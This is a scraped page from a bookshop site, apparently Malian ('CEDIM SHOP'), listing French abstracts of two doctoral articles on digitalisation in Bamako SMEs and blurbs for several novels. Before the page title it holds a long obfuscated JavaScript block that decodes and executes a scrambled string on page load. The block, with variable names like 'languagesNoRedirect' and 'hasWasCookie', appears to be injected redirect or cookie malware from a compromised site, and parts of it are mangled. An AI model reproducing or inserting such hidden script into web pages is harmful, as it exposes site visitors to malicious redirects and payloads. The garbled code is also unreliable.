var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})() Cours – CEDIM SHOP
.
  • Digitalisation et performance commerciale des petites et moyennes entreprises (PME) du District de Bamako.

    Digitalisation et performance commerciale des petites et moyennes entreprises (PME) du District de Bamako

    TRAORE Sékou
    Doctorant en Sciences de Gestion
    Institut de Pédagogie Universitaire de Bamako (IPU)
    Centre Universitaire de Recherche en Économie et Science Sociale (CURES).
    Université des Sciences Sociales et de Gestion de Bamako-Mali,
    Afrique de l’Ouest

    sekoutr05@gmail.com

    Cet article a pour objectif de comprendre et d’analyser l’usage du digital et son incidence sur
    la performance commerciale des petites et moyennes entreprises (PME) du District de Bamako.
    Cette recherche est basée sur un paradigme positiviste avec une démarche méthodologique
    quantitative. Elle a été menée auprès des entreprises (PME), à la suite d’une enquête par
    questionnaire comme outil de collectes des données avec un échantillon de 180 PME du District
    de Bamako. Elle a permis de mettre en évidence une incidence positive des outils digitaux sur
    la performance commerciale des petites et moyennes entreprises au Mali. Les résultats de nos
    travaux ont montré l’existence d’un lien significatif entre le digital et la performance
    commerciale des entreprises (PME).

  • Effets des systèmes d’informations sur la performance commerciale des petites et moyennes entreprises (PME) au Mali Cas du district de Bamako.

    Effets des systèmes d’informations sur la performance commerciale des petites et moyennes entreprises (PME) au Mali Cas du district de Bamako.

    TRAORE SEKOU

    Doctorant en Sciences de Gestion
    Institut de Pédagogie Universitaire de Bamako (IPU)
    Centre Universitaire de Recherche en Économie et Science Sociale (CURES).
    Université des Sciences Sociales et de Gestion de Bamako-Mali, Afrique de l’Ouest.

    Sekoutr05@gmail.com

     

    L’objet de cet article est de comprendre l’utilisation des systèmes d’informations et leurs
    impacts sur la performance commerciale dans les petites et moyennes entreprises au Mali et
    particulièrement dans le district de Bamako. Notre étude permet de mettre en évidence
    l’existence d’une relation entre ce degré d’utilisation et la performance commerciale de PME.
    La méthode quantitative a été utilisée dans cette recherche avec un échantillon de 216 PME. Le
    questionnaire a été l’outil privilégié pour la collecte des données primaires. Les résultats
    obtenus de vos travaux montrent une influence positive du système d’informations sur la
    performance commerciale des petites et moyennes entreprises au Mali.

  • Amkoullel l’enfant peul – Mémoires I

     

    Voici un livre de Mémoires qui nous révèle la formation d’un des esprits les plus brillants de l’Afrique noire. Amadou Hampâté Bâ raconte ici sa petite en-fance et son adolescence, à l’époque où, dans le Mali du début du XXe siècle, il s’initiait aux traditions ancestrales, fréquentait l’école française en même temps que la coranique, courait la savane, découvrait le colonialisme et s’apprêtait à devenir l’un des derniers grands dépositaires d’une civilisation orale en pleine mutation.

    Roman d’aventures, tableau de mœurs et fresque historique, ce livre restitue dans une langue savoureuse et limpide toutes les richesses, les couleurs et la vie du grand récit oral africain, et donne une belle leçon d’humour, de tolérance et d’humanité.

  • La Grande Traversée

     

    Majimé, jeune employé d’une maison d’édition, se voit confier la réalisation d’un nouveau dictionnaire du japonais, un projet titanesque baptisé “La Grande Traversée”. L’un des premiers termes sur lesquels il est amené à travailler n’est autre que le mot “amour”. Mais comment définir ce dont on n’a pas fait l’expérience ? À vingt-sept ans, aussi maladroit avec les gens qu’il est habile avec les mots, Majimé n’a jamais eu de petite amie.
    Bientôt, sa rencontre avec Kaguya, une jeune apprentie-chef, qui éprouve la même ferveur lorsqu’elle cuisine que lui lorsqu’il se plonge dans les infinies richesses de la langue, va lui faire découvrir le plus grand des sentiments, avec toute sa palette d’émotions. Et cette fois-ci, Majimé entend bien ne pas laisser passer sa chance…
    Amour, gastronomie et lexicographie : tels sont les ingrédients de ce roman léger et attachant en forme de conte philosophique, qui laisse sur les lèvres comme un goût d’essentiel.

  • Avec joie et docilité

     

    République de Finlande, XXIe siècle. La nation a pris en compte ses erreurs historiques. La stabilité sociale et la santé publique sont désormais les valeurs prédominantes. Tout ce qui procure du plaisir est formellement interdit. À une exception près – le sexe. Afin que sa distribution soit aussi efficace que possible, le corps scientifique gouvernemental a généré une nouvelle sous-espèce humaine réceptive et soumise.
    Autrefois, on les appelait les femmes.
    Les éléments de la population féminine jugés trop indépendants et difficilement domesticables sont stérilisés dès leur plus jeune âge et constituent un réservoir de main-d’œuvre. Vanna en fait partie. Elle est cependant parvenue, au prix de mille efforts, à se faire passer pour ce qu’elle n’est pas. Mais pour combien de temps encore ?
    Dans la veine de “Nous” d’Evgueni Zamiatine ou du “Meilleur des mondes” d’Aldous Huxley, Johanna Sinisalo nous invite dans ce thriller dystopique aussi troublant que ludique à nous interroger sur les mécanismes de la manipulation des masses et sur la place réservée aux femmes dans nos sociétés.

  • La clause paternelle

     

     

    Deux fois par an, un grand-père revient en Suède voir ses enfants, désormais adultes. Son fils – en congé paternité avec deux petits en bas âge – est un raté névrotique. Sa fille – abandonnée par son propre enfant – est tombée enceinte d’un pauvre type. Seul le grand-père – le fier patriarche – est parfait. Du moins, selon lui… car les visites du père prodigue semblent moins motivées par l’amour qu’il porte à sa progéniture que par l’opportunisme et la nécessité. En effet, ces passages réguliers lui permettent de conserver son titre de séjour. C’est aussi l’occasion pour lui de remettre de l’ordre dans ses démarches administratives et fiscales. Ou plus exactement, de déléguer ces tâches à son fils. Car quand le père rentre, il est entendu que son fils s’occupe de tout. Il ignore que ce dernier a pris une décision qui va tout bousculer : il veut remettre en question la clause paternelle. Mais une telle clause est-elle réellement négociable ?
    Dépeignant l’inexorabilité des liens familiaux avec poésie, étrangeté et humour, Jonas Hassen Khemiri dresse le portrait intime d’une famille chaotique et parfaitement ordinaire, profondément blessée par la mort d’un enfant et la disparition d’un père.

    Prix Médicis Étranger 2021

  • La pièce

     

    La première neige est tombée sur Stockholm et Björn vient d’être muté à l’Administration. Mégalomane sur les bords, Björn a une opinion démesurée de son rôle. Arrogant et psychorigide, il est loin de faire l’unanimité parmi ses collègues. Mais Björn n’est pas là pour fraterniser ou bavarder inutilement, il est là pour travailler et montrer le bon exemple à ceux qui n’ont peut-être pas, comme lui, la bureaucratie dans le sang.

    Un jour, il découvre une porte entre l’ascenseur et les toilettes. Elle ouvre sur un bureau inoccupé où règne un ordre parfait. Cette pièce lui procure une sensation singulière de calme et de bien-être, et il commence à s’y réfugier aussi souvent qu’il le peut pour se ressourcer. Mais un malaise grandissant se répand au sein du service. Pourquoi le nouveau venu reste-t-il toujours planté en plein milieu du couloir à fixer le mur ?

    Après «La Facture», Jonas Karlsson signe un livre délicieusement décalé, qui met en scène un personnage aussi saugrenu qu’irrésistible. Avec ce roman plein de fantaisie, l’auteur nous invite par l’absurde à faire réflexions sur le conformisme, l’intolérance, l’exclusion et la peur de la différence.

    La pièce

    CFA 50 000

Menu principal